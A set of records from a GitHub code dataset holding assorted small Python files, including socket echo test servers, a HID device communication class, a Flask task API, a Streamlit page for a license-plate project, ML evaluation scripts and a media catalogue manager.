self.port = port\n self.host = host\n self.echo = echo\n self.server_socket = self._create_server_socket()\n self.running = True\n\n def _create_server_socket(self):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.settimeout(1) # so to not block indefinitely in accept()..\n s.bind((self.host, self.port))\n if not self.port:\n self.port = s.getsockname()[1]\n except Exception as err:\n print('Could not prepare socket %s' % err)\n raise\n s.listen(5)\n return s\n\n def stop(self):\n self.running = False\n\n def run(self):\n while self.running:\n try:\n client, address = self.server_socket.accept()\n except socket.error:\n pass\n else:\n break\n else:\n return\n rec = client.recv(1024)\n client.send(self.echo)\n client.close()\n self.server_socket.close()\n","repo_name":"savoirfairelinux/monitoring-tools","sub_path":"libs/shinkenplugins/shinkenplugins/tools/tests/netecho.py","file_name":"netecho.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"57"} +{"seq_id":"13396101831","text":"from pyswip import Prolog\n\nprolog = Prolog()\nprolog.consult('bucket_refill.pl')\n\n\nwhile True:\n limits = input(\"Enter jar limits. It should be a comma-separated or space-separated list of positive integers\\n\")\n limits = limits.replace(',', ' ')\n limits = limits.strip().split()\n limits = list(map(int, limits))\n goal = int(input(\"\"\"Enter target volume of water\\n\"\"\").strip())\n print(\"Calculating...\")\n if any(True for _ in prolog.query(f'solve_silent({limits}, {goal})')):\n print(\"It's possible! See solution:\")\n next(prolog.query(f'solve({limits}, {goal})'))\n else:\n print(\"It's impossible :(\")\n\n print()","repo_name":"mstrechen/labs","sub_path":"Intelectual systems [8th semester] /lab2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30863390866","text":"import pickle\n\nmodeline = pickle.load(open(\"HousePricePredictionModel.pkl\", \"rb\"))\n\ndef predictPrice(longitude: float, latitude: float, housingMedianAge: float, totalRooms: float, totalBedrooms: float,\n population: float, households: float, medianIncome: float, oceanProximity: str, bedroom_ratio: float,\n household_rooms: float):\n\n price = 0\n if oceanProximity == \"INLAND\":\n price = modeline.predict([[longitude, latitude, housingMedianAge, totalRooms, totalBedrooms, population,\n households, medianIncome, 0, 1, 0, 0, 0, bedroom_ratio, household_rooms]])\n elif oceanProximity == \"ISLAND\":\n price = modeline.predict([[longitude, latitude, housingMedianAge, totalRooms, totalBedrooms, population,\n households, medianIncome, 0, 0, 1, 0, 0, bedroom_ratio, household_rooms]])\n elif oceanProximity == \"NEAR BAY\":\n price = modeline.predict([[longitude, latitude, housingMedianAge, totalRooms, totalBedrooms, population,\n households, medianIncome, 0, 0, 0, 1, 0, bedroom_ratio, household_rooms]])\n elif oceanProximity == \"NEAR OCEAN\":\n price = modeline.predict([[longitude, latitude, housingMedianAge, totalRooms, totalBedrooms, population,\n households, medianIncome, 0, 0, 0, 0, 1, bedroom_ratio, household_rooms]])\n else:\n price = modeline.predict([[longitude, latitude, housingMedianAge, totalRooms, totalBedrooms, population,\n households, medianIncome, 1, 0, 0, 0, 0, bedroom_ratio, household_rooms]])\n return price\n\n","repo_name":"Abhijit28012002/MLOPs_Flask_Project","sub_path":"HousePricePredict.py","file_name":"HousePricePredict.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"73414529777","text":"from models.tasks.task_factory import TaskFactory\nfrom flask import jsonify, request, Blueprint\n\nfrom flask_jwt_extended import get_jwt_identity, jwt_required\n\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\ntasks = Blueprint(\"tasks\", __name__)\n\n\n@tasks.route(\"/\", methods=[\"POST\"])\n@jwt_required\ndef set_rules_for_device(task_type):\n income_json = request.json\n device_id = income_json.get('device_id')\n lines = income_json.get('lines')\n\n Task = TaskFactory.get_serializer(task_type)\n\n device_task = Task.calculate(device_id, lines)\n device_task.register()\n\n return jsonify(tasks=device_task)\n\n\n@tasks.route(\"/\", methods=[\"DELETE\"])\n# @jwt_required\ndef delete_rules_for_device(device_id):\n income_json = request.json\n\n device_task = DeviceTask.get_by_id(device_task_id=income_json[\"lines\"])\n device_task = device_task.cancel()\n\n return \"OK\"\n\n\n@tasks.route(\"//\", methods=[\"GET\"])\n# @jwt_required\ndef get_all_tasks(date_start, date_end):\n cr_user = get_jwt_identity()\n return \"OK\"\n\n\n@tasks.route(\n \"//\", methods=[\"GET\"]\n)\n@jwt_required\ndef get_rules_for_device(device_id):\n cr_user = get_jwt_identity()\n\n # to check device exists\n Device.get_by_id(device_id=device_id, user_identity=cr_user)\n\n tasks = DeviceTask.get_next_task_by_device_id(device_id=device_id)\n\n return jsonify(tasks=tasks)\n","repo_name":"SergiiButenko/automated_system","sub_path":"services/web/views/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"6199789624","text":"import socket\r\nport = 1234\r\naddress = '127.0.0.1'\r\nBUF_SIZE = 1024\r\n\r\n#create a socket object name 'con'\r\ncon = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ncon.connect((address,port))\r\n\r\nmessage = \"Hello!\"\r\ncon.send(bytes(message,\"utf-8\"));\r\n\r\ndata = con.recv(BUF_SIZE)\r\ncon.close()\r\nprint(data.decode(\"utf-8\"))\r\n","repo_name":"buddhirangana/python-programming","sub_path":"Client - Server/Echo_client.py","file_name":"Echo_client.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"31841324233","text":"#!/usr/bin/env python\n\nimport numbers\nimport threading\nimport rospy\nimport time\nimport hid\n\nfrom pressure_control_interface.utils.comm_handler import build_cmd_string\n\n\nclass Error(Exception):\n \"\"\"Base class for other exceptions\"\"\"\n pass\n\nclass Issue(Error):\n \"\"\"Raised when there's an issue\"\"\"\n pass\n\n\n\n\n\n\"\"\"Start serial communication\nINPUTS:\n\tdevname - the short name of the device you want to use\n\tbaud - baud rate\n\nOUTPUTS:\n\ts - the serial object created\n\"\"\"\t\nclass HIDComs:\n\tdef __init__(self, vendor_id, product_id, serial_number=None, devnum=0):\n\t\tself.connected = False\n\t\ttry:\n\t\t\tself.h = self.get_device(vendor_id, product_id, serial_number)\n\t\t\tself.devnum = devnum\n\t\t\t\n\t\t\t# enable non-blocking mode\n\t\t\tself.h.set_nonblocking(1)\n\n\t\t\tself.DEBUG = False\n\n\n\t\t\t\n\t\t\tself.connected = True\n\t\texcept:\n\t\t\tself.connected=False\n\t\t\tprint(\"HID ERROR: Maybe the device is unplugged?\")\n\t\t\tpass\n\n\n\tdef get_device(self, vendor_id, product_id, serial_number=None):\n\t\th = hid.device()\n\t\tif serial_number is None:\n\t\t\t# If no serial number is geven, open the first device with the product and vendor info\n\t\t\th.open(vendor_id, product_id) # TREZOR VendorID/ProductID\n\t\telse:\n\t\t\t# If a serial number is geven, find that device\n\t\t\tserial_number = str(serial_number)\n\t\t\tpath = None\n\t\t\tfor device_dict in hid.enumerate():\n\t\t\t\tvid = device_dict.get('vendor_id', None)\n\t\t\t\tpid = device_dict.get('product_id', None)\n\t\t\t\tsnum = device_dict.get('serial_number', None)\n\n\t\t\t\tif (vid==vendor_id) & (pid==product_id) & (snum==serial_number):\n\t\t\t\t\tpath = device_dict.get('path', None)\n\t\t\t\t\tbreak\n\t\t\t\n\t\t\th.open_path(path) # Open HID device by path\n\t\treturn h\n\n\tdef initialize(self):\n\t\tpass # Remove this function eventually\n\n\n\tdef flushAll(self):\n\t\tpass # Remove this function eventually\n\t\t#self.h.reset_input_buffer()\n\t\t#self.h.reset_output_buffer()\n\n\n\tdef sendCommand(self, command, values, format=\"%0.2f\"):\n\t\t\"\"\"\n\t\tSend commands to the device\n\n\t\tParameters\n\t\t----------\n\t\tcommand : string\n\t\t\ta command to use\n\t\targs : list, tuple, or number\n\t\t\targuments for the command\n\t\tformat : str\n\t\t\tformat string for arguments\n\n\t\tReturns\n\t\t-------\n\t\t\tout_str - the output string sent\n\t\t\"\"\"\n\n\t\tif self.DEBUG:\n\t\t\tprint(\"HID_COMMS:\",command,values)\n\n\t\tcommand_toSend = \"\"\n\t\tif isinstance(values, list) or isinstance(values, tuple) or isinstance(values, numbers.Number):\n\t\t\tcommand_toSend = build_cmd_string(command, values, format)\n\n\t\telse:\n\t\t\traise ValueError('sendCommand expects either a list or a number')\n\n\n\t\t#Share the value with the main looping thread\n\t\tif not self.reader.new_command.is_set():\n\t\t\tself.reader.command_toSend = command_toSend\n\t\t\tself.reader.new_command.set()\n\n\t\treturn command_toSend\n\n\n\n\tdef start_read_thread(self, reading_cb=None, poll_rate=None):\n\t\tif not reading_cb and not poll_rate:\n\t\t\tself.reader = HIDReadWriteThreaded(self.h, devnum=self.devnum)\n\t\telif reading_cb and not poll_rate:\n\t\t\tself.reader = HIDReadWriteThreaded(self.h, reading_cb=reading_cb, devnum=self.devnum)\n\t\telif not reading_cb and poll_rate:\n\t\t\tself.reader = HIDReadWriteThreaded(self.h, poll_rate=poll_rate, devnum=self.devnum)\n\t\telse:\n\t\t\tself.reader = HIDReadWriteThreaded(self.h, reading_cb=reading_cb, poll_rate=poll_rate, devnum=self.devnum)\n\n\t\tself.reader.DEBUG= self.DEBUG\n\t\tself.reader.start_threaded()\n\n\n\n\tdef shutdown(self):\n\t\tprint(\"HID COMS: Shutting Down\")\n\t\tself.reader.shutdown()\n\n\n\n\n\n\n\n\n\n\n\nclass HIDReadWriteThreaded:\n\tdef __init__(self, hid_in, reading_cb = None, poll_rate = 2000, devnum=0):\n\t\tself.h = hid_in\n\t\tself.r = rospy.Rate(poll_rate)\n\t\tself.reading_cb = reading_cb\n\t\tself.devnum = devnum\n\n\t\tself.command_toSend = None\n\t\tself.curr_send_time = rospy.get_rostime().to_nsec()\n\t\tself.last_send_time = self.curr_send_time\n\t\tself.last_read_time = self.curr_send_time\n\t\t\n\t\tif not self.reading_cb:\n\t\t\tself.reading_cb = self.do_nothing\n\n\n\tdef do_nothing(self,line):\n\t\tprint(line)\n\n\n\tdef start_threaded(self):\n\t\tself.read_now = threading.Event()\n\t\tself.read_now.set()\n\t\tself.new_command = threading.Event()\n\t\tself.new_command.clear()\n\n\t\treading_thread = threading.Thread(target=self.thread_run)\n\t\treading_thread.start()\n\t\tprint('Communication thread started')\n\n\t\n\n\tdef thread_run(self):\n\t\twhile self.read_now.is_set() and not rospy.is_shutdown():\n\t\t\tif self.new_command.is_set():\n\t\t\t\t\n\t\t\t\tif self.DEBUG:\n\t\t\t\t\tself.curr_send_time = rospy.get_rostime().to_nsec()\n\t\t\t\t\tprint(\"SEND: %0.4f ms\"%((self.curr_send_time-self.last_send_time)/1000000.0))\n\t\t\t\t\tself.last_send_time = self.curr_send_time\n\t\t\t\t\n\t\t\t\tself.h.write( [ ord(char) for char in list(self.command_toSend)] + [0] * (64-len(self.command_toSend)))\n\t\t\t\tself.new_command.clear()\n\n\t\t\traw_reading = self.readStuff()\n\t\t\tif raw_reading is not None:\n\t\t\t\tif self.DEBUG:\n\t\t\t\t\tself.curr_read_time = rospy.get_rostime().to_nsec()\n\t\t\t\t\tprint(\"READ: %0.4f ms\"%((self.curr_read_time-self.last_read_time)/1000000.0))\n\t\t\t\t\tself.last_read_time = self.curr_read_time\n\n\t\t\t\tsendout = {'devnum':self.devnum, 'data':raw_reading}\n\t\t\t\tself.reading_cb(sendout);\n\t\t\telse:\n\t\t\t\tself.r.sleep()\n\n\n\tdef readStuff(self):\n\t\t\"\"\"read one line from the incomming buffer\n\t\tINPUTS:\n\t\t\tn/a\n\t\tOUTPUTS:\n\t\t\tout_str - the output string sent\n\t\t\"\"\"\n\t\td = self.h.read(64)\n\t\tif d:\n\t\t\tin_str = \"\"\n\t\t\tfor char_int in d:\n\t\t\t\tif char_int !=0:\n\t\t\t\t\tin_str+=chr(char_int)\n\t\t\treturn in_str\n\t\telse:\n\t\t\treturn None\n\n\tdef shutdown(self):\n\t\tprint(\"HID READER: Shutting Down\")\n\t\tself.read_now.clear()\n\t\tself.h.close()\n\n\n\n\n\n\nclass TrajThread:\n\tdef __init__(self, comm_obj, reading_cb = None, traj_rate = 2000):\n\t\tself.comm_obj = comm_obj\n\t\tself.r = rospy.Rate(traj_rate)\n\t\tself.command_toSend = None\n\t\t\n\n\t\tif not reading_cb:\n\t\t\treading_cb = self.do_nothing\n\n\t\tself.start_thread(reading_cb)\n\n\n\tdef do_nothing(self,line):\n\t\tprint(line)\n\n\n\tdef start_thread(self, reading_cb):\n\t\tself.reading_cb = reading_cb\n\t\tself.running_now = threading.Event()\n\t\tself.running_now.set()\n\t\tself.new_command = self.comm_obj.new_command\n\n\t\ttraj_thread = threading.Thread(target=self.thread_run)\n\t\ttraj_thread.start()\n\t\tprint('Communication thread started')\n\n\t\n\n\tdef thread_run(self):\n\t\twhile self.running_now.is_set() and not rospy.is_shutdown():\n\n\n\t\t\t# Interpolate to get the next setpoint:\n\n\n\t\t\t# Actually send the setpoint if there's nothing stacked up:\n\t\t\tif not self.reader.new_command.is_set():\n\t\t\t\tself.reader.command_toSend = command_toSend\n\t\t\t\tself.new_command.set()\t\t\t\n\t\t\tself.r.sleep()\n\n\n\tdef shutdown(self):\n\t\tprint(\"HID READER: Shutting Down\")\n\t\tself.running_now.clear()","repo_name":"cbteeple/pressure_control_cbt","sub_path":"pressure_controller_ros/src/pressure_controller_ros/hardware_interface/HID_coms.py","file_name":"HID_coms.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"74100865457","text":"import requests\nimport streamlit as st\nfrom streamlit_lottie import st_lottie\n\n# Mise en page\nst.set_page_config(\n page_title=\"Page d'accueil\",\n page_icon=\"🌐\",\n layout=\"wide\",\n)\n\ndef load_lottie(url):\n r = requests.get(url)\n if r.status_code != 200:\n return None\n return r.json()\n\n\n# Navigation\nst.sidebar.title('Navigation')\nselection = st.sidebar.radio(\"Aller à\", ['Page d\\'accueil', 'Application Web'])\n\n# Page d'accueil\nif selection == 'Page d\\'accueil':\n \n # Logo, titre et description\n st.image(\"Logo.png\", width=200)\n st.title('PlateSmart')\n st.subheader('IA de reconnaissance de plaques d\\'immatriculation')\n\n st.write(\"Pour le projet de DeepLearning, nous avons décidé de faire un projet qui peut nous aider dans nos mémoires de fin d'études. Le sujet choisit est un projet ayant pour but de faire une IA qui reconnait et lit le contenu des photographie / images des plaques d\\'immatriculation de véhicules. Ce projet nous permet donc d'introduire une IA pouvant reconnaitre un certain type d'objets (les plaques) puis d'extraires un contenu (le contenu des plaques). Concrètement, l'app peut être utilisé par exemple pour ldes radars en cas d'exces de vitesse, ou des recherches + spécifiques\")\n \n lottie = load_lottie(\"https://assets5.lottiefiles.com/packages/lf20_it6c3dgk.json\")\n st_lottie(lottie, height = 250, key = \"coding\")\n \n st.markdown(\"

By Abel, Canelle, Cedric, Markclay

\", unsafe_allow_html = True)\n\n \n # TRAIT DE SECTION\n #st.markdown(\"\"\"\n #---\n\n #\"\"\", unsafe_allow_html=True)\n\n# Page d'analyse de données\nelif selection == 'Application Web':\n st.title('Page de l\\'application Web')\n \n col1, col2 = st.columns([1,3])\n \n with col1:\n lottie= load_lottie(\"https://assets9.lottiefiles.com/packages/lf20_G6Lxp3nm1p.json\")\n st_lottie(lottie, height = 250, key = \"coding\")\n # ajouter le code pour l'analyse de données\n \n with col2:\n st.subheader('Fonctionnement')\n st.write(\"Le but de l'application étant de reconnaitre et lire des plaques d'immatriculation de véhicules, il parait évident que le bot se doit de savoir ce qu'est une plaque. Pour ce faire, il a du s'entrainer de nombreux cycle (INSERER LE PROCEDE DE L'ENTRAINEMENT DU BOT). Apres avoir repérer la plaque, il doit maintenant extraire le contenu de cette derniere, à savoir les caracteres et les chiffres figurant dessus. Enfin il les notes et les affiches pour que l'on puisse bien vérifier s'il n'y a pas eu d'erreur lors du traitement de la plaque.\")\n \n st.subheader('Demonstration')\n \n\n \n \n \n \n \n \n \n \n \n \n \n \n","repo_name":"Abel-moi/machine-learning","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"43849056517","text":"\nfrom tqdm import tqdm\n\nimport argparse\nimport numpy as np\nimport os, json\nimport time \nfrom scorer.measures_scorer import *\nfrom data.reader import *\n\n\nDATASET_LIST = np.load(\"./results/dataset_list.npy\") \n\n\n\n\nscorers_dict = {\n\t\"ch\" : [\"calinski_harabasz\", calinski_scorer],\n\t\"ch_btw\" : [\"calinski_harabasz_btw\", calinski_btw_scorer],\n\t\"dunn\" : [\"dunn\", dunn_scorer],\n\t\"dunn_btw\": [\"dunn_btw\", dunn_btw_scorer],\n\t\"db\" : [\"davies_bouldin\", davies_bouldin_scorer],\n\t\"db_btw\" : [\"davies_bouldin_btw\", davies_bouldin_btw_scorer],\n\t\"ii\" : [\"i_index\", i_index_scorer],\n\t\"ii_btw\" : [\"i_index_btw\", i_index_btw_scorer],\n\t\"sil\" : [\"silhouette\", silhouette_scorer],\n\t\"sil_btw\" : [\"silhouette_btw\", silhouette_btw_scorer],\n\t\"xb\" : [\"xie_beni\", xie_beni_scorer],\n\t\"xb_btw\" : [\"xie_beni_btw\", xie_beni_btw_scorer],\n\t\"svm\" : [\"support vector machine\", svm_scorer],\n\t\"knn\" : [\"k-nearest neighbors\", knn_scorer],\n\t\"nb\" : [\"naive bayes\", nb_scorer],\n\t\"rf\" : [\"random forest\", rf_scorer],\n\t\"lr\" : [\"logistic regression\", logreg_scorer],\n\t\"lda\" : [\"linear discriminant analysis\", lda_scorer],\n\t\"mlp\" : [\"multi-layer perceptron\", mlp_scorer],\n}\n\n#### Argument handling\nparser = argparse.ArgumentParser(description=\"Obtain the CLM scores of the datasets\", formatter_class=argparse.RawTextHelpFormatter)\nparser.add_argument(\"--measure\", \"-m\", type=str, default=\"all\",\nhelp=f\"\"\"run the specified measure, or all of them if 'all'\nsupported measures: {list(scorers_dict.keys())}\"\"\"\n)\nparser.add_argument(\"--time\", \"-t\", action=\"store_true\", help=\"run time analysis\")\n\nargs = parser.parse_args()\nmeasure_args = args.measure\ntims_args = args.time\n\nnames = []\nscorers = []\nabbs = []\nif measure_args == \"all\":\n\tfor name, scorer in scorers_dict.items():\n\t\tnames.append(scorer[0])\n\t\tscorers.append(scorer[1])\n\t\tabbs.append(name)\nelse:\n\tnames.append(scorers_dict[measure_args][0])\n\tscorers.append(scorers_dict[measure_args][1])\n\tabbs.append(measure_args)\n\n\ndef run_measure(measure_scorer, measure_scorer_name, measure_abbreviation):\n\tscores = []\n\ttimes = []\n\tprint(\"Running \" + measure_scorer_name + \" for datasets...\")\n\tfor dataset in tqdm(DATASET_LIST):\n\t\tdata, labels = read_dataset_by_path(f\"./data/compressed/{dataset}/\")\n\t\tdata = np.array(data)\n\t\tlabels = np.array(labels)\n\t\tdata_max = np.max(data)\n\t\tdata_min = np.min(data)\n\t\tdata_norm = np.abs(data_max) if np.abs(data_max) > np.abs(data_min) else np.abs(data_min)\n\t\tdata = data / data_norm\n\n\t\tunique_labels = np.unique(labels)\n\t\tlabel_map = {old_label: new_label for new_label, old_label in enumerate(unique_labels)}\n\t\tlabels_new= np.array([label_map[old_label] for old_label in labels], dtype=np.int32)\n\n\t\tstart = time.time()\n\t\tscore = measure_scorer(data, labels_new)\n\t\tend = time.time()\n\t\ttimes.append(end - start)\n\n\t\tscores.append(score)\n\n\tprint(\"finished...saving file...\")\n\twith open(f\"./results/measures/{measure_abbreviation}_score.json\", \"w\") as f:\n\t\tjson.dump(scores, f)\n\tif tims_args:\n\t\twith open(f\"./results/measures/{measure_abbreviation}_time.json\", \"w\") as f:\n\t\t\tjson.dump(times, f)\n\tprint(\"finished!!\")\n\nfor i, name in enumerate(names):\n\trun_measure(scorers[i], name, abbs[i])","repo_name":"hj-n/clm","sub_path":"rank_analysis/measures_run.py","file_name":"measures_run.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"20392945223","text":"import numpy as np\nimport os\nimport sys\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nsys.path.append('..')\n\nfrom collections import OrderedDict\nfrom tools.loss import cross_entropy_loss_weighted\nimport json\n\ndef outS(i):\n j = int(i)\n j = (j+1)/2\n j = int(np.ceil((j+1)/2.))\n j = (j+1)/2\n return j\n\ndef resize_label_batch(label, size):\n label_resized = np.zeros((size,size,1, 1))\n interp = nn.UpsamplingBilinear2d(size=(size, size))\n labelVar = torch.FloatTensor(label[np.newaxis, np.newaxis, :, :])\n label_resized[:, :, :, :] = interp(labelVar).data.numpy().transpose(2, 3, 1, 0)\n label_resized[label_resized>0.3] = 1\n label_resized[label_resized != 0] = 1\n\n return label_resized\n\n\nbase_lr = 0.0001\nweight_decay = 0.00005\ndef finetune(model, image, gt):\n model.train()\n #optimizer = optim.SGD([{'params': get_1x_lr_params_NOscale(model), 'lr': base_lr},\n # {'params': get_10x_lr_params(model), 'lr': 10 * base_lr}], lr=base_lr, momentum=0.9,\n # weight_decay=weight_decay)\n\n optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr = 0.001, momentum = 0.9, weight_decay = 0.0005)\n #optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr = 0.00001, momentum = 0.9,\n # weight_decay = 0.000005)\n optimizer.zero_grad()\n\n for i in range(200):\n flag = True\n for j in range(10):\n if flag:\n img_temp, gt_temp = aug_batch(image, gt)\n img_temp = np.expand_dims(img_temp, 0)\n gt_temp = np.expand_dims(gt_temp, 0)\n flag = False\n else:\n img_ttemp, gt_ttemp = aug_batch(image, gt)\n img_ttemp = np.expand_dims(img_ttemp, 0)\n gt_ttemp = np.expand_dims(gt_ttemp, 0)\n #print(img_temp.shape, img_ttemp.shape)\n img_temp = np.concatenate([img_temp, img_ttemp], 0)\n gt_temp = np.concatenate([gt_temp, gt_ttemp], 0)\n\n inp = torch.FloatTensor(img_temp.transpose(0,3,1,2)).cuda()\n out = model(inp)\n\n\n loss = cross_entropy_loss_weighted(out[3], torch.FloatTensor(gt_temp).cuda())\n loss.backward()\n\n optimizer.step()\n optimizer.zero_grad()\n\n model.eval()\n\n return model\n\n\ndef finetune_naive(model, image, gt):\n model.train()\n #optimizer = optim.SGD([{'params': get_1x_lr_params_NOscale(model), 'lr': base_lr},\n # {'params': get_10x_lr_params(model), 'lr': 10 * base_lr}], lr=base_lr, momentum=0.9,\n # weight_decay=weight_decay)\n\n optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr = 0.001, momentum = 0.9, weight_decay = 0.0005)\n #optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr = 0.00001, momentum = 0.9,\n # weight_decay = 0.000005)\n optimizer.zero_grad()\n\n for i in range(200):\n\n inp = torch.FloatTensor(np.expand_dims(image, 0).transpose(0,3,1,2)).cuda()\n out = model(inp)\n\n\n gta = resize_label_batch(gt, outS(321))\n loss = cross_entropy_loss_weighted(out[3], torch.FloatTensor(gta).cuda())\n loss.backward()\n\n optimizer.step()\n optimizer.zero_grad()\n\n model.eval()\n\n return model\n","repo_name":"nijkah/MaskTrack_Box","sub_path":"evaluation/finetuning.py","file_name":"finetuning.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"57"} +{"seq_id":"6628798952","text":"from ast import fix_missing_locations\r\nfrom numpy import append\r\nfrom clip import Clip\r\nfrom documentary import Documentary \r\nfrom film import Film\r\nfrom series import Series\r\nfrom media import Media\r\nfrom actor import Actor\r\n\r\nclass Main:\r\n\r\n def __init__(self):\r\n file = open('database.txt','r')\r\n line = file.read().split('\\n')\r\n self.movie = []\r\n\r\n for i in range(len(line)):\r\n info = line[i].split(',')\r\n if info[0] == 'film':\r\n self.movie.append(Film(info[0],info[1],info[2],info[3],info[4],info[5],info[6],info[7]))\r\n\r\n elif info[0] == 'series':\r\n self.movie.append(Series(info[0],info[1],info[2],info[3],info[4],info[5],info[6],info[7],info[8]))\r\n \r\n elif info[0] == 'clip':\r\n self.movie.append(Clip(info[0],info[1],info[2],info[3],info[4],info[5],info[6],info[7])) \r\n\r\n elif info[0] == 'documentary':\r\n self.movie.append(Documentary(info[0],info[1],info[2],info[3],info[4],info[5],info[6],info[7],info[8]))\r\n \r\n \r\n file.close()\r\n Main.menu(self)\r\n\r\n def menu(self):\r\n\r\n while True:\r\n print('0.Show list')\r\n print('1.Add')\r\n print('2.Edit')\r\n print('3.Delet')\r\n print('4.Search')\r\n print('5.Advance search')\r\n print('6.Download')\r\n print('7.Exit')\r\n x = int(input('Please enter the number: '))\r\n\r\n if x == 0:\r\n Main.show_list(self)\r\n \r\n if x == 1:\r\n Main.add(self)\r\n\r\n elif x == 2:\r\n Main.edit(self)\r\n \r\n elif x == 3:\r\n Main.delete(self)\r\n\r\n elif x == 4:\r\n Main.search(self)\r\n \r\n elif x == 5:\r\n Main.search_advance(self)\r\n\r\n elif x == 6:\r\n Main.download(self)\r\n\r\n elif x == 7: \r\n Main.save(self)\r\n break\r\n \r\n def show_list(self):\r\n\r\n for i in self.movie :\r\n\r\n if i.type == 'series' or i.type == 'documentary':\r\n Series.show_info(i)\r\n \r\n else:\r\n Media.show_info(i)\r\n \r\n\r\n def add(self):\r\n new_type = input('Write type of the media: \\nfilm\\nserial\\nclip\\ndocumentry: ')\r\n new_name = input('Enter name: ')\r\n new_director = input('Enter director: ')\r\n new_imdb = input('Enter imdb score: ')\r\n new_url = input('Enter url: ')\r\n new_duration = input('Enter duration(minute): ')\r\n new_year = input('Enter year: ')\r\n new_casts = input('Enter casts: ')\r\n\r\n if new_type == 'film':\r\n self.movie.append(Film(new_type, new_name, new_director ,new_imdb , new_url ,new_duration , new_year ,new_casts))\r\n\r\n elif new_type == 'clip':\r\n self.movie.append(Clip(new_type, new_name, new_director ,new_imdb , new_url ,new_duration , new_year ,new_casts))\r\n\r\n elif new_type == 'series':\r\n new_part = input('Enter number of episods: ')\r\n self.movie.append(Series(new_type, new_name, new_director ,new_imdb , new_url ,new_duration , new_year ,new_casts, new_part)) \r\n\r\n elif new_type == 'documentary' :\r\n new_part = input('Enter number of episods: ')\r\n self.movie.append(Documentary(new_type, new_name, new_director ,new_imdb , new_url ,new_duration , new_year ,new_casts, new_part))\r\n \r\n print('add done!')\r\n \r\n def edit(self):\r\n k = 0\r\n m = input('Enter name of the movie: ')\r\n\r\n for movie in self.movie:\r\n if m == movie.name:\r\n k = 1\r\n if movie.type == 'series' :\r\n Series.edit_series(movie)\r\n elif movie.type == 'documentary':\r\n Documentary.edit_doc(movie)\r\n elif movie.type == 'film':\r\n Film.edit_film(movie)\r\n elif movie.type == 'clip':\r\n Clip.edit_clip(movie) \r\n print('Edit done') \r\n \r\n if k == 0:\r\n print('not fonded')\r\n\r\n def delete(self):\r\n n = input('Enter name of the movie: ')\r\n\r\n for movie in self.movie :\r\n if n == movie.name :\r\n self.movie.remove(movie)\r\n print('Delete done!')\r\n break\r\n\r\n if movie == len(self.movie) and n!= movie.name:\r\n print('not found')\r\n\r\n def search(self):\r\n k = 1\r\n n = input('Enter name of the movie:')\r\n for i in self.movie :\r\n if n == i.name :\r\n Media.show_info(i)\r\n k = 0\r\n if k == 1:\r\n print('not found') \r\n\r\n def search_advance(self):\r\n k = 0\r\n a = int(input('Enter first time: '))\r\n b = int(input('Enter second time: '))\r\n\r\n for i in self.movie:\r\n if a <= int(i.duration) <= b :\r\n Media.show_info(i)\r\n k = 1\r\n if k == 0 :\r\n print('not exist') \r\n \r\n def download(self):\r\n n = input('Enter name of the movie: ')\r\n\r\n for movie in self.movie:\r\n if n == movie.name :\r\n Media.download(movie)\r\n \r\n\r\n def save(self):\r\n file = open('database.txt','w')\r\n\r\n for i in self.movie:\r\n if i.type == 'series' or i.type == 'documentary' : \r\n if i != len(self.movie)-1 :\r\n str1 = i.type +','+ i.name +','+ i.director +','+ i.IMDBscore +','+ i.url +','+ i.duration +','+ i.year +','+ i.casts +','+ i.parts + '\\n'\r\n else:\r\n str1 = i.type +','+ i.name +','+ i.director +','+ i.IMDBscore +','+ i.url +','+ i.duration +','+ i.year +','+ i.casts +','+ i.parts \r\n file.write(str1)\r\n\r\n elif i.type == 'film' or i.type == 'clip' :\r\n if i != len(self.movie)-1 :\r\n str1 = i.type +','+ i.name +','+ i.director +','+ i.IMDBscore +','+ i.url +','+ i.duration +','+ i.year +','+ i.casts +'\\n'\r\n else:\r\n str1 = i.type +','+ i.name +','+ i.director +','+ i.IMDBscore +','+ i.url +','+ i.duration +','+ i.year +','+ i.casts\r\n file.write(str1)\r\n \r\n file.close()\r\n\r\nMain() ","repo_name":"maryamkhoshkhoo/PythonCourse","sub_path":"Assignment10/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"30851746022","text":"n = \"1025\"\n\ncount = 0\n\nwhile(n != '1'):\n if(int(n)%2!=0):\n x = int(n)+1\n n = str(x)\n count += 1\n else:\n count += 1\n y = int(n)//2\n n = str(y)\n\nprint(count)\n\n \n","repo_name":"yashtazor/Google-Foobar-Challenge","sub_path":"Level - 3/B - Fuel Injection 